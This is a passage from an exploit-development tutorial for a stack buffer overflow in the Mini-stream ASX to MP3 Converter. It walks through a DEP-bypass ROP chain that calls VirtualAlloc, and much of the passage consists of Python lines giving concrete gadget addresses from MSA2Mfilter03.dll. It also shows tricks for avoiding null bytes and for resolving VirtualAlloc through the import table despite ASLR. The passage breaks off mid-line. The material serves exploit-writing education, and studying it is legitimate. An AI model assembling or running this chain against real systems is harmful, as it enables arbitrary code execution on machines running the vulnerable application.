(\<push esp\>.*\<pop esi\>)

The assembly instructions in our first ROP gadget are separated by a semi-colon. We can see that after pushing ESP on the stack, we have the “and al, 0x10” instruction. This instruction is benign and will not affect the main purpose of this gadget, which is to move the value of ESP into ESI. The two other irrelevant assembly instructions (“mov dword [edx], eax” and “mov eax, 0x00000001”) will also not prevent our ROP chain from executing correctly. The best way to see this ROP gadget in action is to launch our exploit against the application and step through each instruction in WinDBG.

Once we attach WinDBG to the ASX2MP3Converter.exe process, we will place a breakpoint on the first ROP gadget and then continue running the process by pressing F5.

We then drag the .m3u file that we generated using our exploit onto the application and our breakpoint will be hit. Since we hijack the instruction pointer (EIP) in the application with our first ROP gadget, the next instruction to be executed will be “push esp”.

We can see that ESP is currently pointing to 0x43434343, which is the next temporary ROP gadget that we placed in our exploit.

It is also important to note that we had to place a 4-byte filler value (0x42424242) between the first ROP gadget (the one that overwrites EIP) and the second one (currently set to 0x43434343). This is because ESP points to the address on the stack at an offset of 4 (i.e. ESP + 4).

If we place our second ROP gadget right after the first one, ESP will jump over it and skip it entirely. That’s why we had to pad our ROP chain with the 4-byte filler between the first and second gadget. The following screenshot demonstrates that in more detail.

By typing “t” we execute the “push esp” instruction, which will move the value of ESP (0x0014c480) onto the stack.

Executing the next instruction by typing “t” performs the “AND” operation on AL (the 8-bit part of EAX) using the value 0x10, which in this case does not have any negative impact on our ROP chain.

We then pop the value from the stack into ESI using the “pop esi” instruction. So now ESI is pointing to the top of the stack, which was our goal in the first place.

The next “junk” instruction is “mov dword ptr [edx],eax”, which moves the value of EAX (currently set to 0 after the AND operation) into the address pointed by EDX.

In this case we were lucky because when we get control over the application, EDX always points to a valid writable memory address, so the instruction “mov dword ptr [edx],eax” does not cause an exception.

The actual writable address is always the heap base address.

The next instruction moves 1 into EAX, which again does not matter in this case. We then return (using the “ret” command) into the next gadget that ESP is pointing to on the stack. Since we placed the value 0x43434343 as the next gadget, we will reach the gadget and then crash.

Step 4: Making ESI Point To Our VirtualAlloc Placeholder

Now that we have ESI containing our stack address, we will need to subtract a value from it to make ESI point to our placeholder address containing 0x45454545. That placeholder address is positioned lower on the stack before EIP gets overwritten with our first ROP gadget.

The best CPU registers to perform arithmetic operations are EAX and ECX. There are plenty of ROP gadgets containing these registers that we can utilise to achieve our goal of making ESI point to 0x45454545.

We will update our second dummy ROP gadget containing 0x43434343 with the following ROP gadgets. Just like the first gadget, these ones were found in the rop.txt file using Sublime’s search functionality.

rop_chain += pack("<L", (0x10022973)) # mov eax, esi ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi
rop_chain += pack("<L", (0x1003985f)) # pop ecx ; ret  ;
rop_chain += pack("<L", (0xffffffe0)) # -0x20
rop_chain += pack("<L", (0x1001465e)) # add eax, ecx ; ret  ;
rop_chain += pack("<L", (0x10040754)) # push eax ; pop esi ; pop ebp ; lea eax, dword [ecx+eax+0x0D] ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into ebp
rop_chain += pack("<L", (0x42424242)) # junk value into ebx

These gadgets will make more sense once we start debugging them in WinDBG. We update our exploit with the additional ROP gadgets, set the breakpoint on the second gadget (0x10022973) and trigger the vulnerability.

The first instruction moves the value of ESI (now points to an address on the stack) into EAX.

We then pop the junk value 0x42424242 into ESI. We don’t really care about ESI right now because EAX already contains its value. We will move the correct value into ESI again after we have done our calculations with EAX and ECX. The “pop esi” instruction was an additional junk instruction that we had to deal with because no clean “mov eax, esi ; ret” instruction was found in the DLL.

Our next goal is to make EAX point to the address of the VirtualAlloc placeholder value (currently set to 0x45454545) lower on the stack. The difference between the current value of EAX and our target value is 0x20.

We cannot just subtract 0x20 from EAX because that would make the remaining 3 bytes in the 32-bit 0x00000020 DWORD value contain 0x00’s. The null byte is one of the bad characters we must avoid in our ROP chain.

An alternative method to subtracting a positive value from EAX is to add a negative value to it. The negative value of 0x20 is 0xffffffe0.

So the ROP gadgets in our exploit pop the negative value into ECX and then add EAX to ECX, which essentially subtracts 0x20 from EAX without using any null byte.

The next step is to move that value into ESI again. The gadget we use pushes EAX onto the stack and then pops it into ESI. There are some additional junk instructions that do not have any impact on our ROP chain. We pop a junk value into EBP, then access and load a specific valid memory address into EAX, and then pop another junk value into EBX. ESI is now pointing to our placeholder address.

Step 5: Finding VirtualAlloc Address

Our next goal is to place the real address of VirtualAlloc from kernel32.dll in place of 0x45454545. Since Windows 10 has ASLR enabled for all OS DLLs and their functions, we cannot just hardcode the static address of VirtualAlloc into our placeholder address, because it will be different after the machine reboots.

We can instead find the address of VirtualAlloc in the Import Address Table (IAT) of the MSA2Mfilter03.dll module. Once we find that address, we can dereference it (i.e. obtain the first 4-byte DWORD value stored in that address), and the dereferenced value will be the actual address of VirtualAlloc inside kernel32.dll. Since the MSA2Mfilter03.dll module does not have ASLR enabled, the address inside the IAT will always be the same.

We copy the module from the directory (C:\Program Files (x86)\Mini-stream\ASX to MP3 Converter\MSA2Mfilter03.dll) to our host machine and open it in IDA Free. We select the “Imports” tab, right click on the main window and select “Quick filter”. We can type VirtualAlloc in the search field to find the IAT address of this API.

We update our exploit to contain the following additional ROP gadgets.

rop_chain += pack("<L", (0x1002a779)) # pop eax ; ret  ;
rop_chain += pack("<L", (0x1004F060)) # VirtualAlloc KERNEL32 IAT
rop_chain += pack("<L", (0x1004d304)) # mov eax, dword [eax] ; ret  ;
rop_chain += pack("<L", (0x10049875)) # mov dword [esi], eax ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi

We first pop the IAT address of VirtualAlloc into EAX, then dereference it and move that value into EAX again. We then move EAX into the address that ESI is pointing to (0x45454545 at this time). We also overcome the junk instruction by popping a random value into ESI. Once we go through the usual process of debugging the ROP gadgets in WinDBG, we have ESI pointing to the address on the stack that stores the real VirtualAlloc address. The next junk instruction pops the value 0x42424242 into ESI, but we don’t care about this because the actual address that ESI is pointing to has already been updated with our VirtualAlloc address.

Step 6: Updating the return address placeholder

We need the call to VirtualAlloc to return into the memory address that had its memory permissions changed by the API. Since we are using our ROP chain to manually prepare the call to VirtualAlloc, we will also need to place a valid return address after the call. The placeholder values are shown below:

In this case we will need to replace the placeholder value of 0x46464646 with the return address on the stack, this is where we will execute our shellcode after we have made the stack executable using VirtualAlloc.

We will use the same ROP gadgets to make ESI point to that placeholder address. However, since we’ve already added quite a few ROP gadgets on the stack, we will need to subtract a bigger value (0x54) from EAX and then move that value into ESI.

rop_chain += pack("<L", (0x10038f84)) # push esp ; and al, 0x10 ; pop esi ; mov dword [edx], eax ; mov eax, 0x00000001 ; ret  ;
rop_chain += pack("<L", (0x10022973)) # mov eax, esi ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi
rop_chain += pack("<L", (0x1003985f)) # pop ecx ; ret  ;
rop_chain += pack("<L", (0xffffffac)) # -0x54
rop_chain += pack("<L", (0x1001465e)) # add eax, ecx ; ret  ;
rop_chain += pack("<L", (0x10040754)) # push eax ; pop esi ; pop ebp ; lea eax, dword [ecx+eax+0x0D] ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into ebp
rop_chain += pack("<L", (0x42424242)) # junk value into ebx

After doing the usual testing with WinDBG, we now have ESI pointing to 0x46464646.

The next step is to locate the address on the stack where our shellcode is and then update the placeholder value with that address.

One method to get that address is to move the value of ESI into EAX and then subtract a negative value saved in ECX from EAX. A negative value stored in ECX that is subtracted from the value in EAX will essentially add that value to EAX.

I couldn’t find a clean gadget for that, so I had to first push the value of ESI on the stack and then pop it into EBX. I was then able to move EBX into EAX and overcome a few junk gadgets in the process.

The following ROP gadgets were added to the exploit. After EAX was made to point to the placeholder value of 0x46464646, a negative value (-0x180) was popped into ECX and was then “subtracted” (i.e. added) from EAX.

rop_chain += pack("<L", (0x100122bb)) # push esi ; add al, 0x5E ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x1001ce45)) # mov eax, ebx ; pop ebp ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into ebp
rop_chain += pack("<L", (0x42424242)) # junk value into ebx
rop_chain += pack("<L", (0x1003985f)) # pop ecx ; ret  ;
rop_chain += pack("<L", (0xfffffe80)) # -0x180
rop_chain += pack("<L", (0x1002c9a4)) # sub eax, ecx ; ret  ;
rop_chain += pack("<L", (0x10049875)) # mov dword [esi], eax ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi

NOTE: It was not possible to perform the exact calculation of where the shellcode would start because our ROP chain wasn’t complete yet. I just used the value 0x180 that I could later update once the chain was complete.

After re-launching the new exploit and stepping through the newly added ROP gadgets, EAX was pointing to our shellcode placeholder values (0x45454545) on the stack.

These values were part of the buffer that we sent in the Python exploit. The placeholder values would be later updated with the actual shellcode.

After having EAX point to the shellcode address, we then move its value into the address that ESI is pointing to (0x46464646).

We have successfully patched the second placeholder value with our return address.

Step 7: Updating the lpAddress argument in VirtualAlloc

The first argument that VirtualAlloc expects is the address that needs to have its permissions changed. In this case it will be the same address that we return to after the API call. Our next placeholder value that we need to patch with lpAddress (shellcode address) is 0x47474747. We can use the same ROP gadgets that we used to patch the return address. The only difference is the bigger negative value (-0x98) that we will need to subtract from EAX because of the additional ROP gadgets we had added on the stack. The exact lpAddress isn’t known to us at this stage because the ROP chain is incomplete, so we add the value 0x180 to EAX temporarily.

rop_chain += pack("<L", (0x10038f84)) # push esp ; and al, 0x10 ; pop esi ; mov dword [edx], eax ; mov eax, 0x00000001 ; ret  ;
rop_chain += pack("<L", (0x10022973)) # mov eax, esi ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi
rop_chain += pack("<L", (0x1003985f)) # pop ecx ; ret  ;
rop_chain += pack("<L", (0xffffff68)) # -0x98
rop_chain += pack("<L", (0x1001465e)) # add eax, ecx ; ret  ;
rop_chain += pack("<L", (0x10040754)) # push eax ; pop esi ; pop ebp ; lea eax, dword [ecx+eax+0x0D] ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into ebp
rop_chain += pack("<L", (0x42424242)) # junk value into ebx
rop_chain += pack("<L", (0x100122bb)) # push esi ; add al, 0x5E ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x1001ce45)) # mov eax, ebx ; pop ebp ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into ebp
rop_chain += pack("<L", (0x42424242)) # junk value into ebx
rop_chain += pack("<L", (0x1003985f)) # pop ecx ; ret  ;
rop_chain += pack("<L", (0xfffffe80)) # -0x180
rop_chain += pack("<L", (0x1002c9a4)) # sub eax, ecx ; ret  ;
rop_chain += pack("<L", (0x10049875)) # mov dword [esi], eax ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi

The final gadget moves the shellcode address into ESI, and we now have 3 values updated for our VirtualAlloc call as can be seen below.

Step 8: Updating the dwSize argument in VirtualAlloc

The next argument we need to update is dwSize that defines the size of the memory page region that will need to have its permissions changed. We can set the size to 0x1, which will apply the permissions to the entire memory page.

Avoiding the null byte issue will be required here since we cannot just move the value 0x1 because the remaining part of the 0x00000001 DWORD will be filled with 0x00. We can use the NEG instruction, which is the same as subtracting a value from 0. So if we subtract 0xffffffff from 0, we will get 0x1 that is created dynamically in memory, avoiding the null byte issue.

The first set of the below ROP chains is the same as the previous ones we used to make ESI point to the placeholder value (0x48484848 in this case). We then pop the value of 0xffffffff into EAX, and then use the NEG instruction against it, which essentially subtracts 0xffffffff from 0 and makes EAX equal to 0x1. EAX is then moved into the address pointed by ESI.

rop_chain += pack("<L", (0x10038f84)) # push esp ; and al, 0x10 ; pop esi ; mov dword [edx], eax ; mov eax, 0x00000001 ; ret  ;
rop_chain += pack("<L", (0x10022973)) # mov eax, esi ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi
rop_chain += pack("<L", (0x1003985f)) # pop ecx ; ret  ;
rop_chain += pack("<L", (0xffffff24)) # -0xdc
rop_chain += pack("<L", (0x1001465e)) # add eax, ecx ; ret  ;
rop_chain += pack("<L", (0x10040754)) # push eax ; pop esi ; pop ebp ; lea eax, dword [ecx+eax+0x0D] ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into ebp
rop_chain += pack("<L", (0x42424242)) # junk value into ebx
rop_chain += pack("<L", (0x1002a779)) # pop eax ; ret  ;
rop_chain += pack("<L", (0xffffffff)) # -1 to be NEGated
rop_chain += pack("<L", (0x1004d1c4)) # neg eax ; pop ebx ; ret ;
rop_chain += pack("<L", (0x42424242)) # junk value into ebx
rop_chain += pack("<L", (0x10049875)) # mov dword [esi], eax ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi

After having updated the exploit with the above ROP chain, we can see that ESI is pointing to the address that has 0x1 in it.

Step 9: Updating the flAllocationType argument in VirtualAlloc

The next argument we need to update is flAllocationType that defines the type of memory allocation. We will need to set its value to 0x1000, which is MEM_COMMIT. This is because we will be updating the already reserved memory on the stack that contains our shellcode. If we were to create a newly allocated memory region, we would need to use MEM_COMMIT | MEM_RESERVE, which would be equal to 0x3000. In our case we are using VirtualAlloc as if it were VirtualProtect, since we are not reserving a new memory region, we are only updating the already existing one on the stack.

Avoiding the null byte issue will also have to be considered here. We cannot just move the value of 0x1000 into the next placeholder address. We can add two large values together, which will make them equal to 0x1000.

If two large values are added together, the final value will roll over the 32-bit address range limit and will be equal to 0x1000. The above calculation in WinDBG demonstrates how those two exact values were obtained.

rop_chain += pack("<L", (0x10038f84)) # push esp ; and al, 0x10 ; pop esi ; mov dword [edx], eax ; mov eax, 0x00000001 ; ret  ;
rop_chain += pack("<L", (0x10022973)) # mov eax, esi ; pop esi ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into esi
rop_chain += pack("<L", (0x1003985f)) # pop ecx ; ret  ;
rop_chain += pack("<L", (0xfffffeec)) # -0x114
rop_chain += pack("<L", (0x1001465e)) # add eax, ecx ; ret  ;
rop_chain += pack("<L", (0x10040754)) # push eax ; pop esi ; pop ebp ; lea eax, dword [ecx+eax+0x0D] ; pop ebx ; ret  ;
rop_chain += pack("<L", (0x42424242)) # junk value into ebp
rop_chain += pack("<L", (0x42424242)) # junk value into ebx
rop_chain += pack("<L", (0x1002a779)) # pop eax ; ret  ;
rop_chain += pack("<L", (0x88888888)) # the first value to be added
rop_chain += pack("<L", (0x1003985f)) # pop ecx ; ret  ;
rop_chain += pack("<L", (0x77778778)) # the second value to be added
rop_chain += pack